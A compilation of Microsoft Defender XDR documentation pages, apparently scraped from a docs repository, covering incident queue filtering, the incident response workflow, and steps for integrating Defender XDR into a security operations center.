-| **OS platform** | Specify device operating systems. |
-| **Classification** | Specify the set of classifications of the related alerts. |
-| **Automated investigation state** | Specify the status of automated investigation. |
-| **Associated threat** | Specify a named threat. |
-| **Alert policies** | Specify an alert policy title. |
-
-The default filter is to show all alerts and incidents with a status of **New** and **In progress** and with a severity of **High**, **Medium**, or **Low**.
-
-You can quickly remove a filter by selecting the **X** in the name of a filter in the **Filters** list.
-
-You can also create filter sets within the incidents page by selecting **Saved filter queries > Create filter set**. If no filter sets have been created, select **Save** to create one.
--
-### Save custom filters as URLs
-
-Once you've configured a useful filter in the incidents queue, you can bookmark the URL of the browser tab or otherwise save it as a link on a Web page, a Word document, or a place of your choice. Bookmarking gives you single-click access to key views of the incident queue, such as:
--- New incidents-- High-severity incidents-- Unassigned incidents-- High-severity, unassigned incidents-- Incidents assigned to me-- Incidents assigned to me and for Microsoft Defender for Endpoint-- Incidents with a specific tag or tags-- Incidents with a specific threat category-- Incidents with a specific associated threat-- Incidents with a specific actor-
-Once you have compiled and stored your list of useful filter views as URLs, use it to quickly process and prioritize the incidents in your queue and [manage](manage-incidents.md) them for subsequent assignment and analysis.
-
-## Search
-
-From the **Search for name or ID** box above the list of incidents, you can search for incidents in a number of ways, to quickly find what you're looking for.
-
-### Search by incident name or ID
-
-Search directly for an incident by typing the incident ID or the incident name. When you select an incident from the list of search results, the Microsoft Defender portal opens a new tab with the properties of the incident, from which you can start your [investigation](investigate-incidents.md).
-
-### Search by impacted assets
-
-You can name an asset&mdash;such as a user, device, mailbox, application name, or cloud resource&mdash;and find all the incidents related to that asset.
-
-## Specify a time range
-
-The default list of incidents is for those that occurred in the last six months. You can specify a new time range from the drop-down box next to the calendar icon by selecting:
--- One day-- Three days-- One week-- 30 days-- 30 days-- Six months-- A custom range in which you can specify both dates and times-
-## Next steps
-
-After you've determined which incident requires the highest priority, select it and:
--- [Manage](manage-incidents.md) the properties of the incident for tags, assignment, immediate resolution for false positive incidents, and comments.-- Begin your [investigations](investigate-incidents.md).-
-## See also
--- [Incidents overview](incidents-overview.md)-- [Manage incidents](manage-incidents.md)-- [Investigate incidents](investigate-incidents.md)
security Incident Response Overview https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/incident-response-overview.md
- Title: Investigate and respond with Microsoft Defender XDR
-description: Investigate and respond to incidents with the capabilities of Microsoft Defender XDR.
-
- - NOCSH
----
- - m365-security
- - tier1
-
- - MOE150
- - MET150
Previously updated : 08/11/2023--
-# Investigate and respond with Microsoft Defender XDR
-
-Here are the primary investigate and respond tasks for Microsoft Defender XDR:
--- [Respond to incidents](#incident-response)-- [Review and approve automatic remediation actions](#automated-investigation-and-remediation)-- [Search for known threats in your data](#proactive-search-for-threats-with-advanced-hunting)-- [Understand the latest cyberattacks](#get-ahead-of-emerging-threats-with-threat-analytics)-
-## Incident response
-
-Microsoft 365 services and apps create alerts when they detect a suspicious or malicious event or activity. Individual alerts provide valuable clues about a completed or ongoing attack. However, attacks typically employ various techniques against different types of entities, such as devices, users, and mailboxes. The result is multiple alerts for multiple entities in your tenant. Because piecing the individual alerts together to gain insight into an attack can be challenging and time-consuming, Microsoft Defender XDR automatically aggregates the alerts and their associated information into an incident.
-
-On an ongoing basis, you need to identify the highest priority incidents for analysis and resolution in the incident queue and get them ready for response. This is a combination of:
--- [Prioritizing](incident-queue.md) to determining the highest priority incidents through filtering and sorting of the incident queue. This is also known as triaging.-- [Managing](manage-incidents.md) incidents by modifying their title, assigning them to an analyst, adding tags and comments, and when resolved, classifying them.-
-For each incident, use your incident response workflow to analyze the incident and its alerts and data to contain the attack, eradicate the threat, recover from the attack, and learn from it. See [this example](incidents-overview.md#example-incident-response-workflow-for-microsoft-365-defender) for Microsoft Defender XDR.
-
-## Automated investigation and remediation
-
-If your organization is using Microsoft Defender XDR, your security operations team receives an alert within the Microsoft Defender portal whenever a malicious or suspicious activity or artifact is detected. Given the never-ending flow of threats that can come in, security teams often face the challenge of addressing the high volume of alerts. Fortunately, Microsoft Defender XDR includes automated investigation and response (AIR) capabilities that can help your security operations team address threats more efficiently and effectively.
-
-When an automated investigation completes, a verdict is reached for every piece of evidence of an incident. Depending on the verdict, remediation actions are identified. In some cases, remediation actions are taken automatically; in other cases, remediation actions await approval through the Microsoft Defender XDR Action center.
-
-For more information, see [Automated investigation and response in Microsoft Defender XDR](m365d-autoir.md).
-
-## Proactive search for threats with advanced hunting
-
-It's not enough to respond to attacks as they occur. For extended, multi-phase attacks such as ransomware, you must proactively search for the evidence of an attack in progress and take action to stop it before it completes.
-
-Advanced hunting is a query-based threat hunting tool in Microsoft Defender XDR that lets you explore up to 30 days of raw data. You can proactively inspect events in your network to locate threat indicators and entities. This flexible access to the Microsoft Defender XDR data enables unconstrained hunting for both known and potential threats.
-
-You can use the same threat hunting queries to build custom detection rules. These rules run automatically to check for and then respond to suspected breach activity, misconfigured machines, and other findings.
-
-See [Proactively hunt for threats with advanced hunting in Microsoft Defender XDR](advanced-hunting-overview.md) for more information.
-
-## Get ahead of emerging threats with threat analytics
-
-Threat analytics is a threat intelligence capability in Microsoft Defender XDR designed to assist your security team to be as efficient as possible while facing emerging threats. It includes detailed analysis and information on:
--- Active [threat actors](/microsoft-365/security/intelligence/microsoft-threat-actor-naming) and their campaigns-- Popular and new attack techniques-- Critical vulnerabilities-- Common attack surfaces-- Prevalent malware-
-Threat analytics also includes information on related incidents and impacted assets within your Microsoft 365 tenant for each identified threat.
-
-Each identified threat includes an analyst report, a comprehensive analysis of the threat written by Microsoft security researchers who are at the forefront of cybersecurity detection and analysis. These reports can also provide information on how the attacks appear in Microsoft Defender XDR.
-
-For more information, see [Threat analytics in Microsoft Defender XDR](threat-analytics.md).
-
security Incidents Overview https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/incidents-overview.md
- Title: Incident response in the Microsoft Defender portal
-description: Investigate incidents seen across devices, users, and mailboxes in the unified security operations platform in the Microsoft Defender portal.
-
- - NOCSH
----
- - m365-security
- - tier1
- - usx-security
--
- - MOE150
- - MET150
Previously updated : 03/29/2024
-appliesto:
-- Microsoft Defender XDR-- Microsoft Sentinel in the Microsoft Defender portal--
-# Incident response in the Microsoft Defender portal
-
-An *incident* in the Microsoft Defender portal is a collection of related alerts and associated data that make up the story of an attack. It's also a case file that your SOC can use to investigate that attack and manage, implement, and document the response to it.
-
-The Microsoft Sentinel and Microsoft Defender services create alerts when they detect a suspicious or malicious event or activity. Individual alerts provide valuable evidence of a completed or ongoing attack. However, increasingly prevalent and sophisticated attacks typically employ a variety of techniques and vectors against different types of asset entities, such as devices, users, and mailboxes. The result is multiple alerts, from multiple sources, for multiple asset entities in your digital estate.
-
-Because individual alerts each tell only part of the story, and because manually grouping individual alerts together to gain insight into an attack can be challenging and time-consuming, the unified security operations platform automatically identifies alerts that are related&mdash;from both Microsoft Sentinel and Microsoft Defender XDR&mdash;and aggregates them and their associated information into an incident.
--
-Grouping related alerts into an incident gives you a comprehensive view of an attack. For example, you can see:
--- Where the attack started.-- What tactics were used.-- How far the attack has gone into your digital estate.-- The scope of the attack, such as how many devices, users, and mailboxes were impacted.-- All of the data associated with the attack.-
-The unified security operations platform in the Microsoft Defender portal includes methods to automate and assist in the triage, investigation, and resolution of incidents.
--- [Microsoft Copilot in Defender](security-copilot-in-microsoft-365-defender.md) harnesses AI to support analysts with complex and time-consuming daily workflows, including end-to-end incident investigation and response with clearly described attack stories, step-by-step actionable remediation guidance and incident activity summarized reports, natural language KQL hunting, and expert code analysis&mdash;optimizing on SOC efficiency across Microsoft Sentinel and Defender XDR data.-
- This capability is in addition to the other AI-based functionality that Microsoft Sentinel brings to the unified platform, in the areas of user and entity behavior analytics, anomaly detection, multi-stage threat detection, and more.
--- Automated attack disruption uses high-confidence signals collected from Microsoft Defender XDR and Microsoft Sentinel to automatically disrupt active attacks at machine speed, containing the threat and limiting the impact.--- If [enabled](m365d-enable.md), Microsoft Defender XDR can [automatically investigate and resolve](m365d-autoir.md) alerts from Microsoft 365 and Entra ID sources through automation and artificial intelligence. You can also perform additional remediation steps to resolve the attack.--- Microsoft Sentinel [automation rules](/azure/sentinel/automate-incident-handling-with-automation-rules) can automate triage, assignment, and management of incidents, regardless of their source. They can apply tags to incidents based on their content, suppress noisy (false positive) incidents, and close resolved incidents that meet the appropriate criteria, specifying a reason and adding comments.-
-<a name='incidents-and-alerts-in-the-microsoft-365-defender-portal'></a>
--
-## Incidents and alerts in the Microsoft Defender portal
-
-> [!TIP]
-> For a limited time during January 2024, when you visit the **Incidents** page, Defender Boxed appears. Defender Boxed highlights your organization's security successes, improvements, and response actions during 2023. To reopen Defender Boxed, in the Microsoft Defender portal, go to **Incidents**, and then select **Your Defender Boxed**.
-
-You manage incidents from **Investigation & response > Incidents & alerts > Incidents** on the quick launch of the [Microsoft Defender portal](https://security.microsoft.com). Here's an example:
--
-Selecting an incident name displays the incident page, starting with the entire **attack story** of the incident, including:
--- **Alert page within incident**: The scope of alerts related to the incident and their information on the same tab.--- **Graph**: A visual representation of the attack that connects the different suspicious entities that are part of the attack with the asset entities that make up the attack's targets, such as users, devices, apps, and mailboxes.-
-You can view the asset and other entity details directly from the graph and act on them with response options such as like disabling an account, deleting a file, or isolating a device.
--
-The incident page consists of the following tabs:
--- **Attack story**-
- Mentioned above, this tab includes the timeline of the attack, including all the alerts, asset entities, and remediation actions taken.
--- **Alerts**-
- All the alerts related to the incident, their sources, and information.
--- **Assets**-
- All the assets (protected entities such as devices, users, mailboxes, apps, and cloud resources) that have been identified to be part of or related to the incident.
--- **Investigations**-
- All the [automated investigations](m365d-autoir.md) triggered by alerts in the incident, including the status of the investigations and their results.
--- **Evidence and Response**-
- All the suspicious entities in the alerts of the incident, which constitute evidence supporting the attack story. These entities can include IP addresses, files, processes, URLs, registry keys and values, and more.
--- **Summary**-
- A quick overview of the impacted assets associated with alerts.
-
-> [!NOTE]
-> If you see an *Unsupported alert type* alert status, it means that automated investigation capabilities cannot pick up that alert to run an automated investigation. However, you can [investigate these alerts manually](investigate-incidents.md#alerts).
-
-<a name='example-incident-response-workflow-for-microsoft-365-defender'></a>
-
-## Incident response workflow example in the Microsoft Defender portal
-
-Here's a workflow example for responding to incidents in Microsoft 365 with the Microsoft Defender portal.
--
-On an ongoing basis, identify the highest priority incidents for analysis and resolution in the incident queue and get them ready for response. This is a combination of:
--- [Triaging](incident-queue.md) to determining the highest priority incidents through filtering and sorting of the incident queue.-- [Managing](manage-incidents.md) incidents by modifying their title, assigning them to an analyst, and adding tags and comments.-
-You can use Microsoft Sentinel automation rules to automatically triage and manage (and even respond to) some incidents as they're created, removing the easiest-to-handle incidents from taking up space in your queue.
-
-Consider these steps for your own incident response workflow:
-
-| Stage | Steps |
-| -- | -- |
-| For each incident, begin an [attack and alert investigation and analysis](investigate-incidents.md). | <ol><li> View the attack story of the incident to understand its scope, severity, detection source, and which asset entities are affected.<li>Begin analyzing the alerts to understand their origin, scope, and severity with the alert story within the incident.<li>As needed, gather information on impacted devices, users, and mailboxes with the graph. Select any entity to open a flyout with all the details. Follow through to the entity page for more insights.<li>See how Microsoft Defender XDR has [automatically resolved some alerts](m365d-autoir.md) with the **Investigations** tab.<li>As needed, use information in the data set for the incident for more information with the **Evidence and Response** tab. |
-| After or during your analysis, perform containment to reduce any additional impact of the attack and eradication of the security threat. | For example,<li>Disable compromised users<li>Isolate impacted devices<li>Block hostile IP addresses. |
-| As much as possible, recover from the attack by restoring your tenant resources to the state they were in before the incident.||
-| [Resolve](manage-incidents.md#resolve-an-incident) the incident and document your findings. | Take time for post-incident learning to: <li>Understand the type of the attack and its impact.<li>Research the attack in [Threat Analytics](threat-analytics.md) and the security community for a security attack trend.<li>Recall the workflow you used to resolve the incident and update your standard workflows, processes, policies, and playbooks as needed.<li>Determine whether changes in your security configuration are needed and implement them. |
-
-If you're new to security analysis, see the [introduction to responding to your first incident](incidents-overview.md) for additional information and to step through an example incident.
-
-For more information about incident response across Microsoft products, see [this article](/security/operations/incident-response-overview).
-
-<a name='example-security-operations-for-microsoft-365-defender'></a>
-
-## Integrating security operations in the Microsoft Defender portal
-
-Here's an example of integrating security operations (SecOps) processes in the Microsoft Defender portal.
--
-Daily tasks can include:
--- [Managing](manage-incidents.md) incidents-- Reviewing [automated investigation and response (AIR)](m365d-action-center.md) actions in the Action center-- Reviewing the latest [Threat Analytics](threat-analytics.md)-- [Responding](investigate-incidents.md) to incidents-
-Monthly tasks can include:
--- Reviewing [AIR settings](m365d-configure-auto-investigation-response.md)-- Reviewing [Secure Score](microsoft-secure-score-improvement-actions.md) and [Microsoft Defender Vulnerability Management](../defender-endpoint/next-gen-threat-and-vuln-mgt.md)-- Reporting to your IT security management chain-
-Quarterly tasks can include a report and briefing of security results to the Chief Information Security Officer (CISO).
-
-Annual tasks can include conducting a major incident or breach exercise to test your staff, systems, and processes.
-
-Daily, monthly, quarterly, and annual tasks can be used to update or refine processes, policies, and security configurations.
-
-See [Integrating Microsoft Defender XDR into your security operations](integrate-microsoft-365-defender-secops.md) for more details.
-
-### SecOps resources across Microsoft products
-
-For more information about SecOps across Microsoft's products, see these resources:
--- [Capabilities](/security/compass/security-operations-capabilities)-- [Best practices](/azure/cloud-adoption-framework/secure/security-operations)-- [Videos and slides](/security/operations/security-operations-videos-and-decks)-
-## Incident notifications by email
-
-You can set up the Microsoft Defender portal to notify your staff with an email about new incidents or updates to existing incidents. You can choose to get notifications based on:
--- Alert severity-- Alert sources-- Device group-
-To set up email notifications for incidents, see [get email notifications on incidents](m365d-notifications-incidents.md).
-
-## Training for security analysts
-
-Use this learning module from Microsoft Learn to understand how to use Microsoft Defender XDR to manage incidents and alerts.
-
-|Training:|Investigate incidents with Microsoft Defender XDR|
-|||
-|![Investigate incidents with Microsoft Defender XDR training icon.](../../media/incidents-overview/m365-defender-address-security-investigation.svg)| Microsoft Defender XDR unifies threat data from multiple services and uses AI to combine them into incidents and alerts. Learn how to minimize the time between an incident and its management for subsequent response and resolution. <p> 27 min - 6 Units |
-
-> [!div class="nextstepaction"]
-> [Start >](/training/modules/defender-investigate-incidents/)
-
-## Next steps
-
-Use the listed steps based on your experience level or role on your security team.
-
-### Experience level
-
-Follow this table for your level of experience with security analysis and incident response.
-
-| Level | Steps |
-|:-|:--|
-| **New** | <ol><li> See the [Respond to your first incident walkthrough](first-incident-overview.md) to get a guided tour of a typical process of analysis, remediation, and post-incident review in the Microsoft Defender portal with an example attack. </li><li> See which incidents should be [prioritized](incident-queue.md) based on severity and other factors. </li><li> [Manage incidents](manage-incidents.md), which includes renaming, assigning, classifying, and adding tags and comments based on your incident management workflow.</li></ol> |
-| **Experienced** | <ol><li> Get started with the incident queue from the **Incidents** page of the Microsoft Defender portal. From here you can: </li> <ul><li> See which incidents should be [prioritized](incident-queue.md) based on severity and other factors. </li><li> [Manage incidents](manage-incidents.md), which includes renaming, assigning, classifying, and adding tags and comments based on your incident management workflow. </li><li> Perform [investigations](investigate-incidents.md) of incidents. </li></ul> </li><li> Track and respond to emerging threats with [threat analytics](threat-analytics.md). </li><li> Proactively hunt for threats with [advanced threat hunting](advanced-hunting-overview.md). </li><li> See these [incident response playbooks](/security/operations/incident-response-playbooks) for detailed guidance for phishing, password spray, and app consent grant attacks. </li></ol> |
-
-### Security team role
-
-Follow this table based on your security team role.
-
-| Role | Steps |
-|||
-| Incident responder (Tier 1) | Get started with the incident queue from the **Incidents** page of the Microsoft Defender portal. From here you can: <ul><li> See which incidents should be [prioritized](incident-queue.md) based on severity and other factors. </li><li> [Manage incidents](manage-incidents.md), which includes renaming, assigning, classifying, and adding tags and comments based on your incident management workflow. </li></ul> |
-| Security investigator or analyst (Tier 2) | <ol><li> Perform [investigations](investigate-incidents.md) of incidents from the **Incidents** page of the Microsoft Defender portal. </li><li> See these [incident response playbooks](/security/operations/incident-response-playbooks) for detailed guidance for phishing, password spray, and app consent grant attacks. </li></ol> |
-| Advanced security analyst or threat hunter (Tier 3) | <ol><li>Perform [investigations](investigate-incidents.md) of incidents from the **Incidents** page of the Microsoft Defender portal. </li><li> Track and respond to emerging threats with [threat analytics](threat-analytics.md). </li><li> Proactively hunt for threats with [advanced threat hunting](advanced-hunting-overview.md). </li><li> See these [incident response playbooks](/security/operations/incident-response-playbooks) for detailed guidance for phishing, password spray, and app consent grant attacks. |
-| SOC manager | See how to [integrate Microsoft Defender XDR into your Security Operations Center (SOC)](integrate-microsoft-365-defender-secops.md). |
-
security Integrate Microsoft 365 Defender Secops Plan https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/integrate-microsoft-365-defender-secops-plan.md
- Title: Step 1. Plan for Microsoft Defender XDR operations readiness
-description: The basics of planning for Microsoft Defender XDR operations readiness when integrating Microsoft Defender XDR into your security operations.
-
- - NOCSH
----
- - zerotrust-solution
- - msftsolution-secops
- - tier2
-
- - MOE150
- - MET150
Previously updated : 07/15/2021--
-# Step 1. Plan for Microsoft Defender XDR operations readiness
--
-**Applies to:**
-- Microsoft Defender XDR-
-Whatever the current maturity of your security operations, it's important for you to align with your Security Operations Center (SOC). While there's no single model that fits every organization, there are certain aspects that are more common than others.
-
-The following sections describe the core functions of the SOC.
-
-## Provide situational awareness of modern threats
-
-A SOC team prepares for and hunts new and incoming threats so that they can work with the organization to establish countermeasures and responses. Your SOC team should have personnel that are highly trained in modern attack methods and techniques and understand threat actors. Shared threat intelligence and frameworks like the [Cyber Kill Chain](https://www.microsoft.com/security/blog/2016/11/28/disrupting-the-kill-chain/) or [MITRE ATT&CK framework](https://attack.mitre.org/) can empower your staff of threat analysts and threat hunters.
-
-## Provide first, second, and potentially third level responses to cyber incidents and events
-
-The SOC is the frontline of defense to security events and incidents. When an event, threat, attack, policy violation, or audit finding triggers an alert or call to action, the SOC team makes an assessment to triage and contain it or escalate it for investigation. Therefore, the SOC first line responders must have broad technical knowledge of security events and indicators.
-
-## Centralize monitoring and logging of your organization's security sources
-
-Usually, the SOC team's core function is to make sure all security devices such as firewalls, intrusion prevention systems, data loss prevention systems, vulnerability management systems, and identity systems are functioning correctly and being monitored. The SOC teams work with the broader network operations such as identity, DevOps, cloud, application, data science, and other business teams to ensure the analysis of security information is centralized and secured. Additionally, the SOC team is responsible for maintaining logs of the data in useable and readable formats, which could include parsing and normalizing disparate formats.
-
-## Establish Red, Blue, and Purple team operational readiness
-
-Every SOC team should test its preparedness in responding to a cyber incident. Testing can be done via training exercises, such as table-tops and practice runs with various individuals in IT, security, and at the business level. Individual training exercise teams are created based on representative roles and are either playing the role of a defender (Blue Team), an attacker (Red Team), or as observers seeking to improve methods and techniques of both the Blue and Red teams through strengths and weakness that is uncovered during the exercise (Purple Team).
-
-## Next step
-
-[Step 2. Perform a SOC integration readiness assessment using the Zero Trust Framework](integrate-microsoft-365-defender-secops-readiness.md)
security Integrate Microsoft 365 Defender Secops Readiness https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/integrate-microsoft-365-defender-secops-readiness.md
- Title: Step 2. Perform a SOC integration readiness assessment using the Zero Trust Framework
-description: The basics of performing a SOC integration readiness assessment using the Zero Trust Framework when integrating Microsoft Defender XDR into your security operations.
-
- - NOCSH
----
- - zerotrust-solution
- - msftsolution-secops
- - tier2
-
- - MOE150
- - MET150
Previously updated : 07/15/2021--
-# Step 2. Perform a SOC integration readiness assessment using the Zero Trust Framework
--
-**Applies to:**
-- Microsoft Defender XDR-
-Once the core functions of the Security Operations Center (SOC) team are defined, the next step for your organization is to prepare for the adoption of Microsoft Defender XDR through a [Zero Trust approach](/security/zero-trust/). Adoption can help you determine the requirements needed for deploying Microsoft Defender XDR using modern industry-leading practices, while evaluating Microsoft Defender XDR's capabilities against your environment.
-
-This approach is based on a strong foundation of protections and includes key areas such as identity, endpoints (devices), data, apps, infrastructure, and networking. The Readiness Assessment team determines the areas where a foundational requirement for enabling Microsoft Defender XDR hasn't yet been met and what needs remediation.
-
-The following list provides some examples of things that must be remediated in order for the SOC to fully optimize processes in the SOC:
--- **Identity:** Legacy on-premises Active Directory Domain Services (AD DS) domains, no MFA plan, no inventory of privileged accounts, and others.-- **Endpoints (devices):** Large number of legacy operating systems, limited device inventory, and others.-- **Data and apps:** Lack of data governance standards, or no inventory of custom apps that won't integrate.-- **Infrastructure:** Large number of unsanctioned SaaS licenses, no container security, and others.-- **Networking:** Performance issues due to low bandwidth, flat network, wireless security issues, and others.-
-Use the guidance in [turning on Microsoft Defender XDR](m365d-enable.md) to capture the baseline set of configuration requirements. These steps help determine remediation activities the SOC teams have to carry out to effectively develop use cases.
-
-Adoption procedures and use case creation are described in Steps 3 and 4.
-
-## Next step
-
-[Step 3. Plan for Microsoft Defender XDR integration with your SOC catalog of services](integrate-microsoft-365-defender-secops-services.md)
security Integrate Microsoft 365 Defender Secops Roles https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/integrate-microsoft-365-defender-secops-roles.md
- Title: Step 4. Define Microsoft Defender XDR roles, responsibilities, and oversight
-description: The basics of defining roles, responsibilities, and oversight when integrating Microsoft Defender XDR into your security operations.
-
- - NOCSH
----
- - zerotrust-solution
- - msftsolution-secops
- - tier2
-
- - MOE150
- - MET150
Previously updated : 07/15/2021--
-# Step 4. Define Microsoft Defender XDR roles, responsibilities, and oversight
--
-**Applies to:**
-- Microsoft Defender XDR-
-Your organization must establish ownership and accountability of the Microsoft Defender XDR licenses, configurations, and administration as initial tasks before any operational roles can be defined. Typically, the ownership of the licenses, subscription costs, and administration of Microsoft 365 and Enterprise Security + Mobility (EMS) services (which may include Microsoft Defender XDR) fall outside the Security Operations Center (SOC) teams. SOC teams should work with those individuals to ensure proper oversight of Microsoft Defender XDR.
-
-Many modern SOCs assign its team members to categories based on their skillsets and functions. For example:
--- A threat intelligence team assigned to tasks related to lifecycle management of threat and analytics functions.-- A monitoring team comprised of SOC analysts responsible for maintaining logs, alerts, events, and monitoring functions.-- An engineering & operations team assigned to engineer and optimize security devices.-
-SOC team roles and responsibilities for Microsoft Defender XDR would naturally integrate into these teams.
-
-The following table breaks out each SOC team's roles and responsibilities and how their roles integrate with Microsoft Defender XDR.
-
-| SOC team | Roles and responsibilities | Microsoft Defender XDR tasks |
-|:-|:--|:-|
-| SOC Oversight | <ul><li>Performs SOC governance</li><li>Establishes daily, weekly, monthly processes</li><li>Provides training and awareness</li><li>Hires staff, participates in peer groups and meetings</li><li>Conducts Blue, Red, Purple team exercises</ul> | <ul><li>Microsoft Defender portal access controls</li><li>Maintains feature/URL and licensing update register</li><li>Maintains communication with IT, legal, compliance, and privacy stakeholders</li><li>Participates in change control meetings for new Microsoft 365 or Microsoft Azure initiatives</ul> |
-| Threat Intelligence & Analytics | <ul><li>Threat intel feed management</li><li>Virus and malware attribution</li><li>Threat modeling & threat event categorizations</li><li>Insider threat Attribute development </li><li>Threat Intel Integration with Risk Management program</li><li>Integrates data insights with data science, BI, and analytics across HR, legal, IT, and security teams<ul> | <ul><li>Maintains Microsoft Defender for Identity threat modeling</li><li>Maintains Microsoft Defender for Office 365 threat modeling</li><li>Maintains Microsoft Defender for Endpoint threat modeling</ul> |
-| Monitoring | <ul><li>Tier 1, 2, 3 analysts</li><li>Log source maintenance and engineering</li><li>Data source ingestion </li><li>SIEM parsing, alerting, correlation, optimization</li><li>Event and alert generation</li><li>Event and alert analysis</li><li>Event and alert reporting</li><li>Ticketing system maintenance</ul> | Uses: <ul><li>Security & Compliance Center</li><li>Microsoft Defender portal</ul> |
-| Engineering & SecOps | <ul><li>Vulnerability management for apps, systems, and endpoints</li><li>XDR/SOAR automation</li><li>Compliance testing</li><li>Phishing and DLP engineering</li><li>Engineering</li><li>Coordinates change control</li><li>Coordinates runbook updates</li><li>Penetration testing<ul> | <ul><li>Microsoft Defender for Cloud Apps</li><li>Defender for Endpoint</li><li>Defender for Identity</ul> |
-| Computer Security Incident Response Team (CSIRT) | <ul><li>Investigates and responds to cyber incidents</li><li>Performs forensics</li><li>**May often be isolated from SOC**</ul> | Collaborate and maintain Microsoft Defender XDR incident response playbooks |
-||||
--
-## Next step
-
-[Step 5. Develop and test use cases](integrate-microsoft-365-defender-secops-use-cases.md)
security Integrate Microsoft 365 Defender Secops Services https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/integrate-microsoft-365-defender-secops-services.md
- Title: Step 3. Plan for Microsoft Defender XDR integration with your SOC catalog of services
-description: The basics of integrating Microsoft Defender XDR into your security operations catalog of services.
-keywords: incidents, alerts, investigate, correlation, attack, devices, users, identities, identity, mailbox, email, 365, microsoft, m365, incident response, cyber-attack, secops, security operations, soc
-
- - NOCSH
----
- - zerotrust-solution
- - msftsolution-secops
- - tier3
-
- - MOE150
- - MET150
Previously updated : 05/09/2023--
-# Step 3. Plan for Microsoft Defender XDR integration with your SOC catalog of services
--
-**Applies to:**
-- Microsoft Defender XDR-
-An established Security Operations Center (SOC) should have a catalog of services that might include:
--- Intrusion & malware analysis-- Attribution & reverse engineering-- Threat intelligence-- Analytics-- Hunting investigation-- Forensics-- Incident response -- Computer Security Incident Response Team (CSIRT) (that may be segregated from SOC) -- Compliance testing-- Insider threat & fraud monitoring-- Security incident & event monitoring -- Vulnerability scanning-- Extended Detection and Response (XDR)/Security Orchestration, Automation, and Response (SOAR)-- Phishing-- Data loss prevention-- Brand monitoring-
-The components of Microsoft Defender XDR are:
--- **Microsoft Defender for Identity** (formerly Azure Advanced Threat Protection, also known as Azure ATP) is a cloud-based security solution that uses Active Directory Domain Services (AD DS) signals to identify, detect, and investigate advanced threats, compromised identities, and malicious insider actions directed at organizations.--- **Microsoft Defender for Endpoint** is a holistic, cloud delivered endpoint security solution for devices that includes risk-based vulnerability management and assessment, attack surface reduction, behavioral based and cloud-powered next generation protection, endpoint detection and response (EDR), automatic investigation and remediation, managed hunting services, rich APIs, and unified security management.---- **Microsoft Defender for Cloud Apps** is a cloud access security broker (CASB) that supports various deployment modes including log collection, API connectors, and reverse proxy. It provides rich visibility, control over data travel, and sophisticated analytics to identify and combat cyberthreats across all Microsoft and third-party cloud services.-
-Because Microsoft Defender XDR components and technologies span various functions, your SOC team will need to determine which roles and responsibilities are best suited to manage each component of Microsoft Defender XDR and align to service function.
-
-To integrate the capabilities of Microsoft Defender XDR, you will need to refine the SOC services. For more information about the capabilities of Microsoft Defender XDR, see the following articles:
--- [What is Microsoft Defender for Endpoint?](/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint)-- [What is Microsoft Defender for Identity?](/defender-for-identity/what-is)-- [What is Defender for Office 365?](/microsoft-365/security/defender/microsoft-365-defender)-- [What is Microsoft Defender for Cloud Apps?](/cloud-app-security/what-is-cloud-app-security)-
-## Next step
-
-[Step 4. Define Microsoft Defender XDR roles, responsibilities, and oversight](integrate-microsoft-365-defender-secops-roles.md)
security Integrate Microsoft 365 Defender Secops Tasks https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/integrate-microsoft-365-defender-secops-tasks.md
- Title: Step 6. Identify SOC maintenance tasks
-description: Identify SOC maintenance tasks when integrating Microsoft Defender XDR into your security operations.
-
- - NOCSH
----
- - zerotrust-solution
- - msftsolution-secops
- - tier2
-
- - MOE150
- - MET150
Previously updated : 07/15/2021--
-# Step 6. Identify SOC maintenance tasks
--
-**Applies to:**
-- Microsoft Defender XDR-
-Here are the periodic or as-needed tasks to maintain your SOC for Microsoft Defender XDR.
-
-|Activity|Description|Cadence|Team assigned|
-|||||
-|Service administration collaboration with SOC Teams|Administration of peripheral services such as asset tracking (CMDB), application licensing (new SaaS licenses), device purchases (upgrades or renew device deployments), and other Microsoft 365 tenant-wide changes (Intune, Microsoft 365, and others) that may affect deployment of Microsoft Defender XDR products.|Weekly and as needed|Engineering & SecOps|
-|Update anti-phishing and data loss prevention campaigns|Incorporate SOC use case and lessons learned with extended organization (HR, legal, training, and others).|Monthly and as needed|SOC Oversight|
-|Deploy automation scripts and services where appropriate|Download and test automation scripts and configuration files from approved Microsoft sites to improve Microsoft Defender XDR operations.|Weekly and as needed|Engineering and SecOps|
-|Portal or license management|Check announcements and the Microsoft Messaging Center for Microsoft Defender portal or licensing needs based on Microsoft updates and new features.|Weekly|SOC Oversight|
-|Update SOC escalation tickets|All SOC teams update escalation tickets (such as Sentinel, ServiceNow tickets) assigned to them.|Daily|All SOC teams|
-|Track Microsoft Defender Vulnerability Management (MDVM) remediation activity|Generate MDVM Secure Score remediation activity and report to asset owners through an intranet portal.|Daily|Monitoring|
-|Generate Secure Score report|Monitoring team tracks and reports Secure Score improvements.|Weekly SOC|Monitoring|
-|Run IR tabletop exercise|Test SOC team playbooks in tabletop exercise.|As needed|All SOC teams|
-
-Integrate these tasks into your current SOC processes.
-
-## Next steps
-
-You should review the guides referred to in this content and in the [Microsoft Defender XDR library](/microsoft-365/security/defender) to determine how your own implementation of Microsoft Defender XDR should be structured and integrated.
security Integrate Microsoft 365 Defender Secops Use Cases https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/integrate-microsoft-365-defender-secops-use-cases.md
- Title: Step 5. Develop and test use cases
-description: The basics of developing and testing use cases when integrating Microsoft Defender XDR into your security operations.
-
- - NOCSH
----
- - zerotrust-solution
- - msftsolution-secops
- - tier2
-
- - MOE150
- - MET150
Previously updated : 07/15/2021--
-# Step 5. Develop and test use cases
--
-**Applies to:**
-- Microsoft Defender XDR-
-The recommended methods to deploy Microsoft Defender XDR in your Security Operations Center (SOC) depends on the SOC team's current set of tools, processes, and skill set. Maintaining cyber hygiene across platforms can be challenging because of the vast amount of data coming from dozens if not hundreds of security sources.
-
